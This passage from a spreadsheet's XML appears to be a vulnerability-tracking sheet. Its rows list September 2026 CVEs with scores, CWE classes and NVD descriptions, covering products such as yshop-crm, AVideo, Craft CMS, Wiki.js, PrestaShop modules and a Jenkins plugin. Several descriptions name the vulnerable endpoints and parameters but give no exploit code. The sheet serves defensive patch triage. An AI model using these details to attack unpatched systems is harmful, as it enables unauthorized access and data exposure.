          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1362" s="5" t="inlineStr"/>
      <c r="Q1362" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R1362" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Open5GS up to 2.8.0. Affected by this issue is the function smf_n4_handle_session_report_request of the file src/smf/n4-handler.c of the component PFCP Session Report Request Handler. The manipulation leads to reachable assertion. The attack may be initiated remotely. The identifier of the patch is e5f0c06d0f2d9613b003daa1cfa3ba8a4bd157e9. It is suggested to install a patch to address this issue.</t>
        </is>
      </c>
      <c r="S1362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92416</t>
        </is>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92455</t>
        </is>
      </c>
      <c r="D1363" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1363" s="5" t="inlineStr"/>
      <c r="H1363" s="5" t="inlineStr"/>
      <c r="I1363" s="5" t="inlineStr"/>
      <c r="J1363" s="5" t="inlineStr"/>
      <c r="K1363" s="5" t="inlineStr"/>
      <c r="L1363" s="5" t="inlineStr"/>
      <c r="M1363" s="5" t="inlineStr"/>
      <c r="N1363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1363" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1363" s="5" t="inlineStr"/>
      <c r="Q1363" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1363" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 fails to enforce authorization on the sendSms and sendMail endpoints in CrmCustomerController, allowing any authenticated back-office user to send SMS and email to arbitrary customers. Attackers can invoke POST /admin-api/crm/customer/send-sms and POST /admin-api/crm/customer/send-mail with arbitrary customerIds, templateCode, and templateParams to deliver unauthorized messages through the organization's SMS and email channels.</t>
        </is>
      </c>
      <c r="S1363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92455</t>
        </is>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92458</t>
        </is>
      </c>
      <c r="D1364" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1364" s="5" t="inlineStr"/>
      <c r="H1364" s="5" t="inlineStr"/>
      <c r="I1364" s="5" t="inlineStr"/>
      <c r="J1364" s="5" t="inlineStr"/>
      <c r="K1364" s="5" t="inlineStr"/>
      <c r="L1364" s="5" t="inlineStr"/>
      <c r="M1364" s="5" t="inlineStr"/>
      <c r="N1364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1364" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1364" s="5" t="inlineStr"/>
      <c r="Q1364" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1364" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 contains a missing authorization vulnerability in the StoreProductController onSale handler that allows authenticated back-office users to modify product sale status. Attackers can invoke the GET /admin-api/product/store-product/sale endpoint with sequential product IDs to withdraw entire product catalogs from sale or re-enable withdrawn products without proper permission checks.</t>
        </is>
      </c>
      <c r="S1364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92458</t>
        </is>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92569</t>
        </is>
      </c>
      <c r="D1365" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1365" s="5" t="inlineStr"/>
      <c r="H1365" s="5" t="inlineStr"/>
      <c r="I1365" s="5" t="inlineStr"/>
      <c r="J1365" s="5" t="inlineStr"/>
      <c r="K1365" s="5" t="inlineStr"/>
      <c r="L1365" s="5" t="inlineStr"/>
      <c r="M1365" s="5" t="inlineStr"/>
      <c r="N1365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1365" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1365" s="5" t="inlineStr"/>
      <c r="Q1365" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1365" s="5" t="inlineStr">
        <is>
          <t>Hippo4j through 1.5.0 contains a server-side request forgery vulnerability in four ThreadPoolController endpoints that fail to validate the clientAddress parameter. Authenticated attackers can supply arbitrary hostnames and ports to trigger outbound GET requests to internal networks and cloud metadata services.</t>
        </is>
      </c>
      <c r="S1365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92569</t>
        </is>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92581</t>
        </is>
      </c>
      <c r="D1366" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1366" s="5" t="inlineStr"/>
      <c r="H1366" s="5" t="inlineStr"/>
      <c r="I1366" s="5" t="inlineStr"/>
      <c r="J1366" s="5" t="inlineStr"/>
      <c r="K1366" s="5" t="inlineStr"/>
      <c r="L1366" s="5" t="inlineStr"/>
      <c r="M1366" s="5" t="inlineStr"/>
      <c r="N1366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1366" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1366" s="5" t="inlineStr"/>
      <c r="Q1366" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1366" s="5" t="inlineStr">
        <is>
          <t>In AVideo through 29.0, Like::__construct() performs counter arithmetic on raw request values before validation, allowing array-typed parameters to desynchronize stored votes from counters. Authenticated attackers can send array-typed like parameters followed by ordinary requests to drive video like counts arbitrarily negative, with the corruption persisting in the denormalized counter until manual repair.</t>
        </is>
      </c>
      <c r="S1366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92581</t>
        </is>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92585</t>
        </is>
      </c>
      <c r="D1367" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1367" s="5" t="inlineStr"/>
      <c r="H1367" s="5" t="inlineStr"/>
      <c r="I1367" s="5" t="inlineStr"/>
      <c r="J1367" s="5" t="inlineStr"/>
      <c r="K1367" s="5" t="inlineStr"/>
      <c r="L1367" s="5" t="inlineStr"/>
      <c r="M1367" s="5" t="inlineStr"/>
      <c r="N1367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1367" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1367" s="5" t="inlineStr"/>
      <c r="Q1367" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1367" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 (commit c3edcc274c389816d434acadac07ee78eaf330c1) fails to validate video access permissions in the API like endpoint, allowing logged-in users to vote on password-protected and group-restricted videos. Attackers can submit like and dislike requests to increment vote counters on videos they cannot watch by calling the set.json.php endpoint with APIName parameters.</t>
        </is>
      </c>
      <c r="S1367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92585</t>
        </is>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92586</t>
        </is>
      </c>
      <c r="D1368" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1368" s="5" t="inlineStr"/>
      <c r="H1368" s="5" t="inlineStr"/>
      <c r="I1368" s="5" t="inlineStr"/>
      <c r="J1368" s="5" t="inlineStr"/>
      <c r="K1368" s="5" t="inlineStr"/>
      <c r="L1368" s="5" t="inlineStr"/>
      <c r="M1368" s="5" t="inlineStr"/>
      <c r="N1368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1368" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1368" s="5" t="inlineStr"/>
      <c r="Q1368" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1368" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 (commit c3edcc274c389816d434acadac07ee78eaf330c1) fails to verify video access permissions in the set_api_comment function, allowing authenticated users to post comments on password-protected and group-restricted videos. Attackers can submit POST requests to the comment API endpoint with arbitrary video IDs to write comments on videos they cannot watch.</t>
        </is>
      </c>
      <c r="S1368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92586</t>
        </is>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92589</t>
        </is>
      </c>
      <c r="D1369" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1369" s="5" t="inlineStr"/>
      <c r="H1369" s="5" t="inlineStr"/>
      <c r="I1369" s="5" t="inlineStr"/>
      <c r="J1369" s="5" t="inlineStr"/>
      <c r="K1369" s="5" t="inlineStr"/>
      <c r="L1369" s="5" t="inlineStr"/>
      <c r="M1369" s="5" t="inlineStr"/>
      <c r="N1369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1369" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1369" s="5" t="inlineStr"/>
      <c r="Q1369" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1369" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 5.0.0 through 5.10.12 (fixed in 5.10.13) contains a broken access control flaw in the nested-elements reorder endpoint. When an authenticated control panel user with viewEntries and viewPeerEntries (but without savePeerEntries) opens another author's entry in read-only mode, Craft unconditionally grants that session a `manageNestedElements::&lt;ownerId&gt;::field:&lt;handle&gt;` authorization flag for the entry's Matrix/Address fields. Unlike the corresponding delete endpoint, actions/nested-elements/reorder trusts this session flag alone and never rechecks the caller's save permission for the owner element. As a result, a view-only user can POST to actions/nested-elements/reorder using the ownerElementType, ownerId, ownerSiteId, attribute, elementIds, and offset parameters present in the read-only page source and rewrite the sort order of Matrix blocks or Addresses belonging to content they are explicitly denied save access to.</t>
        </is>
      </c>
      <c r="S1369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92589</t>
        </is>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92754</t>
        </is>
      </c>
      <c r="D1370" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1370" s="5" t="inlineStr"/>
      <c r="H1370" s="5" t="inlineStr"/>
      <c r="I1370" s="5" t="inlineStr"/>
      <c r="J1370" s="5" t="inlineStr"/>
      <c r="K1370" s="5" t="inlineStr"/>
      <c r="L1370" s="5" t="inlineStr"/>
      <c r="M1370" s="5" t="inlineStr"/>
      <c r="N1370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1370" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1370" s="5" t="inlineStr"/>
      <c r="Q1370" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1370" s="5" t="inlineStr">
        <is>
          <t>PatrowlManager through 1.8.4 contains an improper access control vulnerability in the user listing API endpoint where the authorization decorator is commented out. Authenticated attackers with low-privilege accounts can enumerate all users and their privilege flags including superuser and staff status by accessing the endpoint.</t>
        </is>
      </c>
      <c r="S1370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92754</t>
        </is>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92764</t>
        </is>
      </c>
      <c r="D1371" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1371" s="5" t="inlineStr"/>
      <c r="H1371" s="5" t="inlineStr"/>
      <c r="I1371" s="5" t="inlineStr"/>
      <c r="J1371" s="5" t="inlineStr"/>
      <c r="K1371" s="5" t="inlineStr"/>
      <c r="L1371" s="5" t="inlineStr"/>
      <c r="M1371" s="5" t="inlineStr"/>
      <c r="N1371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1371" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1371" s="5" t="inlineStr"/>
      <c r="Q1371" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1371" s="5" t="inlineStr">
        <is>
          <t>OpenCVE before 3.1.0 fails to properly scope the organizations API endpoint to the token's organization, instead returning the token creator's memberships. Attackers with organization-scoped tokens can list and retrieve every organization their creator belongs to, bypassing intended token isolation boundaries.</t>
        </is>
      </c>
      <c r="S1371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92764</t>
        </is>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92774</t>
        </is>
      </c>
      <c r="D1372" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1372" s="5" t="inlineStr"/>
      <c r="H1372" s="5" t="inlineStr"/>
      <c r="I1372" s="5" t="inlineStr"/>
      <c r="J1372" s="5" t="inlineStr"/>
      <c r="K1372" s="5" t="inlineStr"/>
      <c r="L1372" s="5" t="inlineStr"/>
      <c r="M1372" s="5" t="inlineStr"/>
      <c r="N1372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1372" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1372" s="5" t="inlineStr"/>
      <c r="Q1372" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1372" s="5" t="inlineStr">
        <is>
          <t>Wiki.js through 2.5.314 omits page tags from authorization checks in multiple GraphQL resolvers, allowing tag-based access restrictions to be bypassed. Attackers can query the list, tree, tags, searchTags, and links resolvers to retrieve restricted page metadata including titles, descriptions, paths, and tag information without proper authorization.</t>
        </is>
      </c>
      <c r="S1372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92774</t>
        </is>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92802</t>
        </is>
      </c>
      <c r="D1373" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1373" s="5" t="inlineStr"/>
      <c r="H1373" s="5" t="inlineStr"/>
      <c r="I1373" s="5" t="inlineStr"/>
      <c r="J1373" s="5" t="inlineStr"/>
      <c r="K1373" s="5" t="inlineStr"/>
      <c r="L1373" s="5" t="inlineStr"/>
      <c r="M1373" s="5" t="inlineStr"/>
      <c r="N1373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1373" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1373" s="5" t="inlineStr"/>
      <c r="Q1373" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1373" s="5" t="inlineStr">
        <is>
          <t>kan through 0.6.0 fails to properly validate board creation permissions in the GitHub project import endpoint, allowing guests to create boards despite lacking board:create permission. Attackers can bypass authorization checks by using the importProjects mutation to create boards while remaining blocked on direct creation paths.</t>
        </is>
      </c>
      <c r="S1373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92802</t>
        </is>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92809</t>
        </is>
      </c>
      <c r="D1374" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1374" s="5" t="inlineStr"/>
      <c r="H1374" s="5" t="inlineStr"/>
      <c r="I1374" s="5" t="inlineStr"/>
      <c r="J1374" s="5" t="inlineStr"/>
      <c r="K1374" s="5" t="inlineStr"/>
      <c r="L1374" s="5" t="inlineStr"/>
      <c r="M1374" s="5" t="inlineStr"/>
      <c r="N1374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1374" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1374" s="5" t="inlineStr"/>
      <c r="Q1374" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1374" s="5" t="inlineStr">
        <is>
          <t>PrestaShop psgdpr versions through 1.4.3 fail to validate that GDPR consent log entries are attributed to the authenticated customer. Authenticated attackers can submit arbitrary customer identifiers to create forged consent records for other customers, corrupting audit logs.</t>
        </is>
      </c>
      <c r="S1374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92809</t>
        </is>
      </c>
    </row>
    <row r="1375">
      <c r="A1375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92810</t>
        </is>
      </c>
      <c r="D1375" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1375" s="5" t="inlineStr"/>
      <c r="H1375" s="5" t="inlineStr"/>
      <c r="I1375" s="5" t="inlineStr"/>
      <c r="J1375" s="5" t="inlineStr"/>
      <c r="K1375" s="5" t="inlineStr"/>
      <c r="L1375" s="5" t="inlineStr"/>
      <c r="M1375" s="5" t="inlineStr"/>
      <c r="N1375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1375" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1375" s="5" t="inlineStr"/>
      <c r="Q1375" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1375" s="5" t="inlineStr">
        <is>
          <t>PrestaShop blockwishlist through 3.0.2 fails to validate wishlist ownership in the getUrlByIdWishListAction method, allowing authenticated customers to retrieve share tokens for any wishlist by identifier. Attackers can supply sequential wishlist identifiers to obtain valid share links and read other customers' private wishlist contents.</t>
        </is>
      </c>
      <c r="S1375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92810</t>
        </is>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1376" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12763</t>
        </is>
      </c>
      <c r="D1376" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1376" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1376" s="5" t="inlineStr"/>
      <c r="H1376" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1376" s="5" t="inlineStr"/>
      <c r="J1376" s="5" t="inlineStr"/>
      <c r="K1376" s="5" t="inlineStr"/>
      <c r="L1376" s="5" t="inlineStr"/>
      <c r="M1376" s="5" t="inlineStr"/>
      <c r="N1376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1376" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1376" s="5" t="inlineStr"/>
      <c r="Q1376" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1376" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow an authenticated attacker to access another user's MCP server context due to improper cache key isolation in the MCP Tools component.</t>
        </is>
      </c>
      <c r="S1376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12763</t>
        </is>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1377" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18151</t>
        </is>
      </c>
      <c r="D1377" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1377" s="5" t="inlineStr"/>
      <c r="H1377" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1377" s="5" t="inlineStr"/>
      <c r="J1377" s="5" t="inlineStr"/>
      <c r="K1377" s="5" t="inlineStr"/>
      <c r="L1377" s="5" t="inlineStr"/>
      <c r="M1377" s="5" t="inlineStr"/>
      <c r="N1377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1377" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1377" s="5" t="inlineStr"/>
      <c r="Q1377" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1377" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to obtain sensitive information due to a race condition during the WebSocket handshake process.</t>
        </is>
      </c>
      <c r="S1377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18151</t>
        </is>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92131</t>
        </is>
      </c>
      <c r="D1378" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1378" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1378" s="5" t="inlineStr"/>
      <c r="H1378" s="5" t="inlineStr"/>
      <c r="I1378" s="5" t="inlineStr"/>
      <c r="J1378" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K1378" s="5" t="inlineStr"/>
      <c r="L1378" s="5" t="inlineStr"/>
      <c r="M1378" s="5" t="inlineStr"/>
      <c r="N1378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1378" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1378" s="5" t="inlineStr"/>
      <c r="Q1378" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1378" s="5" t="inlineStr">
        <is>
          <t>Jenkins Pipeline: Groovy Libraries Plugin 805.va_fc79344957d and earlier does not restrict the library path provided to the library Pipeline step to a relative path inside the SCM checkout, and follows symbolic links to locations outside of the SCM checkout when retrieving the library, resulting in a path traversal vulnerability, allowing attackers able to configure Pipelines to read files in a resources directory and to delete files in a test directory on the Jenkins controller file system.</t>
        </is>
      </c>
      <c r="S1378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92131</t>
        </is>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92138</t>
        </is>
      </c>
      <c r="D1379" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1379" s="5" t="inlineStr">
